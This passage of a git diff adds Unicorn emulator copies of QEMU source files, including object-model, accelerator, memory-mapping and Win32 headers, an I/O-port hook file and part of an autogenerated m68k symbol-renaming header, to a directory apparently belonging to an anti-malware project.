+ */ +const char *object_property_get_type(Object *obj, const char *name, + Error **errp); + +/** + * object_get_root: + * + * Returns: the root object of the composition tree + */ +Object *object_get_root(struct uc_struct *uc); + +/** + * object_get_canonical_path_component: + * + * Returns: The final component in the object's canonical path. The canonical + * path is the path within the composition tree starting from the root. + */ +gchar *object_get_canonical_path_component(Object *obj); + +/** + * object_get_canonical_path: + * + * Returns: The canonical path for a object. This is the path within the + * composition tree starting from the root. + */ +gchar *object_get_canonical_path(Object *obj); + +/** + * object_resolve_path: + * @path: the path to resolve + * @ambiguous: returns true if the path resolution failed because of an + * ambiguous match + * + * There are two types of supported paths--absolute paths and partial paths. + * + * Absolute paths are derived from the root object and can follow child<> or + * link<> properties. Since they can follow link<> properties, they can be + * arbitrarily long. Absolute paths look like absolute filenames and are + * prefixed with a leading slash. + * + * Partial paths look like relative filenames. They do not begin with a + * prefix. The matching rules for partial paths are subtle but designed to make + * specifying objects easy. At each level of the composition tree, the partial + * path is matched as an absolute path. The first match is not returned. At + * least two matches are searched for. A successful result is only returned if + * only one match is found. If more than one match is found, a flag is + * returned to indicate that the match was ambiguous. + * + * Returns: The matched object or NULL on path lookup failure. 
+ */ +Object *object_resolve_path(struct uc_struct *uc, const char *path, bool *ambiguous); + +/** + * object_resolve_path_type: + * @path: the path to resolve + * @typename: the type to look for. + * @ambiguous: returns true if the path resolution failed because of an + * ambiguous match + * + * This is similar to object_resolve_path. However, when looking for a + * partial path only matches that implement the given type are considered. + * This restricts the search and avoids spuriously flagging matches as + * ambiguous. + * + * For both partial and absolute paths, the return value goes through + * a dynamic cast to @typename. This is important if either the link, + * or the typename itself are of interface types. + * + * Returns: The matched object or NULL on path lookup failure. + */ +Object *object_resolve_path_type(struct uc_struct *uc, const char *path, const char *typename_, + bool *ambiguous); + +/** + * object_resolve_path_component: + * @parent: the object in which to resolve the path + * @part: the component to resolve. + * + * This is similar to object_resolve_path with an absolute path, but it + * only resolves one element (@part) and takes the others from @parent. + * + * Returns: The resolved object or NULL on path lookup failure. + */ +Object *object_resolve_path_component(struct uc_struct *uc, Object *parent, const gchar *part); + +/** + * object_property_add_child: + * @obj: the object to add a property to + * @name: the name of the property + * @child: the child object + * @errp: if an error occurs, a pointer to an area to store the area + * + * Child properties form the composition tree. All objects need to be a child + * of another object. Objects can only be a child of one object. + * + * There is no way for a child to determine what its parent is. It is not + * a bidirectional relationship. This is by design. + * + * The value of a child property as a C string will be the child object's + * canonical path. 
It can be retrieved using object_property_get_str(). + * The child object itself can be retrieved using object_property_get_link(). + */ +void object_property_add_child(Object *obj, const char *name, + Object *child, Error **errp); + +typedef enum { + /* Unref the link pointer when the property is deleted */ + OBJ_PROP_LINK_UNREF_ON_RELEASE = 0x1, +} ObjectPropertyLinkFlags; + +/** + * object_property_allow_set_link: + * + * The default implementation of the object_property_add_link() check() + * callback function. It allows the link property to be set and never returns + * an error. + */ +void object_property_allow_set_link(Object *, const char *, + Object *, Error **); + +/** + * object_property_add_link: + * @obj: the object to add a property to + * @name: the name of the property + * @type: the qobj type of the link + * @child: a pointer to where the link object reference is stored + * @check: callback to veto setting or NULL if the property is read-only + * @flags: additional options for the link + * @errp: if an error occurs, a pointer to an area to store the area + * + * Links establish relationships between objects. Links are unidirectional + * although two links can be combined to form a bidirectional relationship + * between objects. + * + * Links form the graph in the object model. + * + * The @check() callback is invoked when + * object_property_set_link() is called and can raise an error to prevent the + * link being set. If @check is NULL, the property is read-only + * and cannot be set. + * + * Ownership of the pointer that @child points to is transferred to the + * link property. The reference count for *@child is + * managed by the property from after the function returns till the + * property is deleted with object_property_del(). If the + * @flags OBJ_PROP_LINK_UNREF_ON_RELEASE bit is set, + * the reference count is decremented when the property is deleted. 
+ */ +void object_property_add_link(Object *obj, const char *name, + const char *type, Object **child, + void (*check)(Object *obj, const char *name, + Object *val, Error **errp), + ObjectPropertyLinkFlags flags, + Error **errp); + +/** + * object_property_add_str: + * @obj: the object to add a property to + * @name: the name of the property + * @get: the getter or NULL if the property is write-only. This function must + * return a string to be freed by g_free(). + * @set: the setter or NULL if the property is read-only + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add a string property using getters/setters. This function will add a + * property of type 'string'. + */ +void object_property_add_str(Object *obj, const char *name, + char *(*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, const char *, Error **), + Error **errp); + +/** + * object_property_add_bool: + * @obj: the object to add a property to + * @name: the name of the property + * @get: the getter or NULL if the property is write-only. + * @set: the setter or NULL if the property is read-only + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add a bool property using getters/setters. This function will add a + * property of type 'bool'. + */ +void object_property_add_bool(struct uc_struct *uc, Object *obj, const char *name, + bool (*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, bool, Error **), + Error **errp); + +/** + * object_property_add_uint8_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint8'. 
+ */ +void object_property_add_uint8_ptr(Object *obj, const char *name, + const uint8_t *v, Error **errp); + +/** + * object_property_add_uint16_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint16'. + */ +void object_property_add_uint16_ptr(Object *obj, const char *name, + const uint16_t *v, Error **errp); + +/** + * object_property_add_uint32_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint32'. + */ +void object_property_add_uint32_ptr(Object *obj, const char *name, + const uint32_t *v, Error **errp); + +/** + * object_property_add_uint64_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint64'. + */ +void object_property_add_uint64_ptr(Object *obj, const char *name, + const uint64_t *v, Error **Errp); + +/** + * object_property_add_alias: + * @obj: the object to add a property to + * @name: the name of the property + * @target_obj: the object to forward property access to + * @target_name: the name of the property on the forwarded object + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an alias for a property on an object. This function will add a property + * of the same type as the forwarded property. + * + * The caller must ensure that @target_obj stays alive as long as + * this property exists. 
In the case of a child object or an alias on the same + * object this will be the case. For aliases to other objects the caller is + * responsible for taking a reference. + */ +void object_property_add_alias(Object *obj, const char *name, + Object *target_obj, const char *target_name, + Error **errp); + +/** + * object_property_set_description: + * @obj: the object owning the property + * @name: the name of the property + * @description: the description of the property on the object + * @errp: if an error occurs, a pointer to an area to store the error + * + * Set an object property's description. + * + */ +void object_property_set_description(Object *obj, const char *name, + const char *description, Error **errp); + +/** + * object_child_foreach: + * @obj: the object whose children will be navigated + * @fn: the iterator function to be called + * @opaque: an opaque value that will be passed to the iterator + * + * Call @fn passing each child of @obj and @opaque to it, until @fn returns + * non-zero. + * + * Returns: The last value returned by @fn, or 0 if there is no child. + */ +int object_child_foreach(Object *obj, int (*fn)(Object *child, void *opaque), + void *opaque); + +/** + * container_get: + * @root: root of the #path, e.g., object_get_root() + * @path: path to the container + * + * Return a container object whose path is @path. Create more containers + * along the path if necessary. + * + * Returns: the container object. 
+ */ +Object *container_get(struct uc_struct *uc, Object *root, const char *path); + +void container_register_types(struct uc_struct *uc); + +void register_types_object(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/qom-qobject.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/qom-qobject.h new file mode 100644 index 0000000..e22e164 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/qom-qobject.h @@ -0,0 +1,42 @@ +/* + * QEMU Object Model - QObject wrappers + * + * Copyright (C) 2012 Red Hat, Inc. + * + * Author: Paolo Bonzini + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef QEMU_QOM_QOBJECT_H +#define QEMU_QOM_QOBJECT_H + +#include "qom/object.h" + +/* + * object_property_get_qobject: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to QObject, or NULL if + * an error occurs. + */ +struct QObject *object_property_get_qobject(struct uc_struct *uc, Object *obj, const char *name, + struct Error **errp); + +/** + * object_property_set_qobject: + * @obj: the object + * @qobj: The value that will be written to the property. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a property to an object. 
+ */ +void object_property_set_qobject(struct uc_struct *uc, Object *obj, struct QObject *qobj, + const char *name, struct Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/accel.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/accel.h new file mode 100644 index 0000000..3abba24 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/accel.h @@ -0,0 +1,62 @@ +/* QEMU accelerator interfaces + * + * Copyright (c) 2014 Red Hat Inc + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#ifndef HW_ACCEL_H +#define HW_ACCEL_H + +#include "qemu/typedefs.h" +#include "qom/object.h" + +typedef struct AccelState { + /*< private >*/ + Object parent_obj; +} AccelState; + +typedef struct AccelClass { + /*< private >*/ + ObjectClass parent_class; + /*< public >*/ + + const char *opt_name; + const char *name; + int (*available)(void); + int (*init_machine)(MachineState *ms); + bool *allowed; +} AccelClass; + +#define TYPE_ACCEL "accel" + +#define ACCEL_CLASS_SUFFIX "-" TYPE_ACCEL +#define ACCEL_CLASS_NAME(a) (a ACCEL_CLASS_SUFFIX) + +#define ACCEL_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, AccelClass, (klass), TYPE_ACCEL) +#define ACCEL(uc, obj) \ + OBJECT_CHECK(uc, AccelState, (obj), TYPE_ACCEL) +#define ACCEL_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, AccelClass, (obj), TYPE_ACCEL) + +int configure_accelerator(MachineState *ms); + +void register_accel_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/cpus.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/cpus.h new file mode 100644 index 0000000..8a55e0b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/cpus.h @@ -0,0 +1,20 @@ +#ifndef QEMU_CPUS_H +#define QEMU_CPUS_H + +struct uc_struct; + +/* cpus.c */ +int resume_all_vcpus(struct uc_struct*); +void cpu_stop_current(struct uc_struct*); + +#ifndef CONFIG_USER_ONLY +/* vl.c */ +extern int smp_cores; +extern int smp_threads; +#else +/* *-user doesn't have configurable SMP topology */ +#define smp_cores 1 +#define smp_threads 1 +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/memory_mapping.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/memory_mapping.h new file mode 100644 index 0000000..dcf3598 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/memory_mapping.h @@ -0,0 +1,83 @@ +/* + * QEMU memory mapping + * + * Copyright Fujitsu, Corp. 
2011, 2012 + * + * Authors: + * Wen Congyang + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef MEMORY_MAPPING_H +#define MEMORY_MAPPING_H + +#include "qemu/queue.h" +#include "qemu/typedefs.h" + +typedef struct GuestPhysBlock { + /* visible to guest, reflects PCI hole, etc */ + hwaddr target_start; + + /* implies size */ + hwaddr target_end; + + /* points into host memory */ + uint8_t *host_addr; + + QTAILQ_ENTRY(GuestPhysBlock) next; +} GuestPhysBlock; + +/* point-in-time snapshot of guest-visible physical mappings */ +typedef struct GuestPhysBlockList { + unsigned num; + QTAILQ_HEAD(GuestPhysBlockHead, GuestPhysBlock) head; +} GuestPhysBlockList; + +/* The physical and virtual address in the memory mapping are contiguous. */ +typedef struct MemoryMapping { + hwaddr phys_addr; + target_ulong virt_addr; + ram_addr_t length; + QTAILQ_ENTRY(MemoryMapping) next; +} MemoryMapping; + +struct MemoryMappingList { + unsigned int num; + MemoryMapping *last_mapping; + QTAILQ_HEAD(, MemoryMapping) head; +}; + +/* + * add or merge the memory region [phys_addr, phys_addr + length) into the + * memory mapping's list. The region's virtual address starts with virt_addr, + * and is contiguous. The list is sorted by phys_addr. + */ +void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, + hwaddr phys_addr, + hwaddr virt_addr, + ram_addr_t length); + +void memory_mapping_list_free(MemoryMappingList *list); + +void memory_mapping_list_init(MemoryMappingList *list); + +void guest_phys_blocks_free(GuestPhysBlockList *list); +void guest_phys_blocks_init(GuestPhysBlockList *list); +//void guest_phys_blocks_append(GuestPhysBlockList *list); + +void qemu_get_guest_memory_mapping(struct uc_struct *uc, + MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks, + Error **errp); + +/* get guest's memory mapping without do paging(virtual address is 0). 
*/ +void qemu_get_guest_simple_memory_mapping(MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks); + +void memory_mapping_filter(MemoryMappingList *list, int64_t begin, + int64_t length); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/os-win32.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/os-win32.h new file mode 100644 index 0000000..7825c31 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/os-win32.h @@ -0,0 +1,96 @@ +/* + * win32 specific declarations + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2010 Jes Sorensen + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#ifndef QEMU_OS_WIN32_H +#define QEMU_OS_WIN32_H + +#include +#include +#include + +/* Workaround for older versions of MinGW. 
*/ +#ifndef ECONNREFUSED +# define ECONNREFUSED WSAECONNREFUSED +#endif +#ifndef EINPROGRESS +# define EINPROGRESS WSAEINPROGRESS +#endif +#ifndef EHOSTUNREACH +# define EHOSTUNREACH WSAEHOSTUNREACH +#endif +#ifndef EINTR +# define EINTR WSAEINTR +#endif +#ifndef EINPROGRESS +# define EINPROGRESS WSAEINPROGRESS +#endif +#ifndef ENETUNREACH +# define ENETUNREACH WSAENETUNREACH +#endif +#ifndef ENOTCONN +# define ENOTCONN WSAENOTCONN +#endif +#ifndef EWOULDBLOCK +# define EWOULDBLOCK WSAEWOULDBLOCK +#endif + +#if defined(_WIN64) +/* On w64, setjmp is implemented by _setjmp which needs a second parameter. + * If this parameter is NULL, longjump does no stack unwinding. + * That is what we need for QEMU. Passing the value of register rsp (default) + * lets longjmp try a stack unwinding which will crash with generated code. */ + +#if defined(_MSC_VER) // MSVC + +// See qemu/include/utils/setjmp-wrapper-win32.asm for details. +extern int _setjmp_wrapper(jmp_buf); + +# undef setjmp +# define setjmp(env) _setjmp_wrapper(env) + +#else // MinGW + +// Original QEMU patch. +# undef setjmp +# define setjmp(env) _setjmp(env, NULL) +#endif + +#endif +/* QEMU uses sigsetjmp()/siglongjmp() as the portable way to specify + * "longjmp and don't touch the signal masks". Since we know that the + * savemask parameter will always be zero we can safely define these + * in terms of setjmp/longjmp on Win32. + */ +#define sigjmp_buf jmp_buf +#define sigsetjmp(env, savemask) setjmp(env) +#define siglongjmp(env, val) longjmp(env, val) + +size_t getpagesize(void); + +#if !defined(EPROTONOSUPPORT) +# define EPROTONOSUPPORT EINVAL +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/sysemu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/sysemu.h new file mode 100644 index 0000000..e5c9329 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/sysemu.h @@ -0,0 +1,27 @@ +#ifndef SYSEMU_H +#define SYSEMU_H +/* Misc. 
things related to the system emulator. */ + +#include "qemu/timer.h" +#include "qapi/error.h" + +/* vl.c */ + +struct uc_struct; + +int runstate_is_running(void); +typedef struct vm_change_state_entry VMChangeStateEntry; + +#define VMRESET_SILENT false +#define VMRESET_REPORT true + +int vm_start(struct uc_struct*); + +void qemu_system_reset_request(struct uc_struct*); +void qemu_system_shutdown_request(void); +void qemu_system_powerdown_request(void); +void qemu_system_reset(bool report); + +extern int smp_cpus; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/ioport.c b/ai_anti_malware/unicorn/unicorn-master/qemu/ioport.c new file mode 100644 index 0000000..336b43d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/ioport.c @@ -0,0 +1,154 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +/* + * splitted out ioport related stuffs from vl.c. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "exec/ioport.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" + +#include "uc_priv.h" + +//#define DEBUG_IOPORT + +#ifdef DEBUG_IOPORT +# define LOG_IOPORT(...) qemu_log_mask(CPU_LOG_IOPORT, ## __VA_ARGS__) +#else +# define LOG_IOPORT(...) do { } while (0) +#endif + +typedef struct MemoryRegionPortioList { + MemoryRegion mr; + void *portio_opaque; + MemoryRegionPortio ports[]; +} MemoryRegionPortioList; + +static uint64_t unassigned_io_read(struct uc_struct* uc, void *opaque, hwaddr addr, unsigned size) +{ + return 0-1ULL; +} + +static void unassigned_io_write(struct uc_struct* uc, void *opaque, hwaddr addr, uint64_t val, + unsigned size) +{ +} + +const MemoryRegionOps unassigned_io_ops = { + unassigned_io_read, + unassigned_io_write, + DEVICE_NATIVE_ENDIAN, +}; + +void cpu_outb(struct uc_struct *uc, pio_addr_t addr, uint8_t val) +{ + //LOG_IOPORT("outb: %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); + // Unicorn: call registered OUT callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_OUT) + ((uc_cb_insn_out_t)hook->callback)(uc, addr, 1, val, hook->user_data); + } +} + +void cpu_outw(struct uc_struct *uc, pio_addr_t addr, uint16_t val) +{ + //LOG_IOPORT("outw: %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); + // Unicorn: call registered OUT callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_OUT) + ((uc_cb_insn_out_t)hook->callback)(uc, addr, 2, val, hook->user_data); + } +} + +void cpu_outl(struct uc_struct *uc, pio_addr_t addr, uint32_t val) +{ + //LOG_IOPORT("outl: %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); + // Unicorn: call registered OUT callbacks + struct hook *hook; + 
HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_OUT) + ((uc_cb_insn_out_t)hook->callback)(uc, addr, 4, val, hook->user_data); + } +} + +uint8_t cpu_inb(struct uc_struct *uc, pio_addr_t addr) +{ + //LOG_IOPORT("inb : %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); + // Unicorn: call registered IN callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_IN) + return ((uc_cb_insn_in_t)hook->callback)(uc, addr, 1, hook->user_data); + } + + return 0; +} + +uint16_t cpu_inw(struct uc_struct *uc, pio_addr_t addr) +{ + //LOG_IOPORT("inw : %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); + // Unicorn: call registered IN callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_IN) + return ((uc_cb_insn_in_t)hook->callback)(uc, addr, 2, hook->user_data); + } + + return 0; +} + +uint32_t cpu_inl(struct uc_struct *uc, pio_addr_t addr) +{ + //LOG_IOPORT("inl : %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); + // Unicorn: call registered IN callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_IN) + return ((uc_cb_insn_in_t)hook->callback)(uc, addr, 4, hook->user_data); + } + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/m68k.h b/ai_anti_malware/unicorn/unicorn-master/qemu/m68k.h new file mode 100644 index 0000000..dffdf7e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/m68k.h @@ -0,0 +1,3020 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_M68K_H +#define UNICORN_AUTOGEN_M68K_H +#define arm_release arm_release_m68k +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_m68k +#define 
ppc_tb_set_jmp_target ppc_tb_set_jmp_target_m68k +#define use_idiv_instructions_rt use_idiv_instructions_rt_m68k +#define tcg_target_deposit_valid tcg_target_deposit_valid_m68k +#define helper_power_down helper_power_down_m68k +#define check_exit_request check_exit_request_m68k +#define address_space_unregister address_space_unregister_m68k +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_m68k +#define phys_mem_clean phys_mem_clean_m68k +#define tb_cleanup tb_cleanup_m68k +#define memory_map memory_map_m68k +#define memory_map_ptr memory_map_ptr_m68k +#define memory_unmap memory_unmap_m68k +#define memory_free memory_free_m68k +#define free_code_gen_buffer free_code_gen_buffer_m68k +#define helper_raise_exception helper_raise_exception_m68k +#define tcg_enabled tcg_enabled_m68k +#define tcg_exec_init tcg_exec_init_m68k +#define memory_register_types memory_register_types_m68k +#define cpu_exec_init_all cpu_exec_init_all_m68k +#define vm_start vm_start_m68k +#define resume_all_vcpus resume_all_vcpus_m68k +#define a15_l2ctlr_read a15_l2ctlr_read_m68k +#define a64_translate_init a64_translate_init_m68k +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_m68k +#define aa64_cacheop_access aa64_cacheop_access_m68k +#define aa64_daif_access aa64_daif_access_m68k +#define aa64_daif_write aa64_daif_write_m68k +#define aa64_dczid_read aa64_dczid_read_m68k +#define aa64_fpcr_read aa64_fpcr_read_m68k +#define aa64_fpcr_write aa64_fpcr_write_m68k +#define aa64_fpsr_read aa64_fpsr_read_m68k +#define aa64_fpsr_write aa64_fpsr_write_m68k +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_m68k +#define aa64_zva_access aa64_zva_access_m68k +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_m68k +#define aarch64_restore_sp aarch64_restore_sp_m68k +#define aarch64_save_sp aarch64_save_sp_m68k +#define accel_find accel_find_m68k +#define accel_init_machine accel_init_machine_m68k +#define accel_type accel_type_m68k 
+#define access_with_adjusted_size access_with_adjusted_size_m68k +#define add128 add128_m68k +#define add16_sat add16_sat_m68k +#define add16_usat add16_usat_m68k +#define add192 add192_m68k +#define add8_sat add8_sat_m68k +#define add8_usat add8_usat_m68k +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_m68k +#define add_cpreg_to_list add_cpreg_to_list_m68k +#define addFloat128Sigs addFloat128Sigs_m68k +#define addFloat32Sigs addFloat32Sigs_m68k +#define addFloat64Sigs addFloat64Sigs_m68k +#define addFloatx80Sigs addFloatx80Sigs_m68k +#define add_qemu_ldst_label add_qemu_ldst_label_m68k +#define address_space_access_valid address_space_access_valid_m68k +#define address_space_destroy address_space_destroy_m68k +#define address_space_destroy_dispatch address_space_destroy_dispatch_m68k +#define address_space_get_flatview address_space_get_flatview_m68k +#define address_space_init address_space_init_m68k +#define address_space_init_dispatch address_space_init_dispatch_m68k +#define address_space_lookup_region address_space_lookup_region_m68k +#define address_space_map address_space_map_m68k +#define address_space_read address_space_read_m68k +#define address_space_rw address_space_rw_m68k +#define address_space_translate address_space_translate_m68k +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_m68k +#define address_space_translate_internal address_space_translate_internal_m68k +#define address_space_unmap address_space_unmap_m68k +#define address_space_update_topology address_space_update_topology_m68k +#define address_space_update_topology_pass address_space_update_topology_pass_m68k +#define address_space_write address_space_write_m68k +#define addrrange_contains addrrange_contains_m68k +#define addrrange_end addrrange_end_m68k +#define addrrange_equal addrrange_equal_m68k +#define addrrange_intersection addrrange_intersection_m68k +#define addrrange_intersects addrrange_intersects_m68k +#define addrrange_make 
addrrange_make_m68k +#define adjust_endianness adjust_endianness_m68k +#define all_helpers all_helpers_m68k +#define alloc_code_gen_buffer alloc_code_gen_buffer_m68k +#define alloc_entry alloc_entry_m68k +#define always_true always_true_m68k +#define arm1026_initfn arm1026_initfn_m68k +#define arm1136_initfn arm1136_initfn_m68k +#define arm1136_r2_initfn arm1136_r2_initfn_m68k +#define arm1176_initfn arm1176_initfn_m68k +#define arm11mpcore_initfn arm11mpcore_initfn_m68k +#define arm926_initfn arm926_initfn_m68k +#define arm946_initfn arm946_initfn_m68k +#define arm_ccnt_enabled arm_ccnt_enabled_m68k +#define arm_cp_read_zero arm_cp_read_zero_m68k +#define arm_cp_reset_ignore arm_cp_reset_ignore_m68k +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_m68k +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_m68k +#define arm_cpu_finalizefn arm_cpu_finalizefn_m68k +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_m68k +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_m68k +#define arm_cpu_initfn arm_cpu_initfn_m68k +#define arm_cpu_list arm_cpu_list_m68k +#define cpu_loop_exit cpu_loop_exit_m68k +#define arm_cpu_post_init arm_cpu_post_init_m68k +#define arm_cpu_realizefn arm_cpu_realizefn_m68k +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_m68k +#define arm_cpu_register_types arm_cpu_register_types_m68k +#define cpu_resume_from_signal cpu_resume_from_signal_m68k +#define arm_cpus arm_cpus_m68k +#define arm_cpu_set_pc arm_cpu_set_pc_m68k +#define arm_cp_write_ignore arm_cp_write_ignore_m68k +#define arm_current_el arm_current_el_m68k +#define arm_dc_feature arm_dc_feature_m68k +#define arm_debug_excp_handler arm_debug_excp_handler_m68k +#define arm_debug_target_el arm_debug_target_el_m68k +#define arm_el_is_aa64 